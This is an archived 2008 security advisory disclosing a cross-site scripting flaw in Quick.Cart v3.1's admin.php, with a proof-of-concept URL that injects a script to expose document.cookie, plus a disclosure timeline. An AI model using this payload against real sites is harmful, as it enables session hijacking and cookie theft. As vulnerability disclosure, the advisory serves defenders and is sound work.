[NOBYTES.COM: #13] Quick.Cart v3.1 Freeware - Cross Site Scripting Sep 16 2008 09:13PM
John Cobb (johnc nobytes com)
Application: Quick.Cart v3.1 Freeware
Authors Site: http://opensolution.org/quick.cart,en,9.html

+--------------------------------------------------------------+

XSS:

http://www.victim.com/admin.php?"><script>alert(document.cookie)</script
><"

+-[Notes:]-----------------------------------------------------+

This only appears to work on Internet Explorer.

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: None Yet

JohnC (at) NoBytes (dot) com [email concealed]

http://www.NoBytes.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus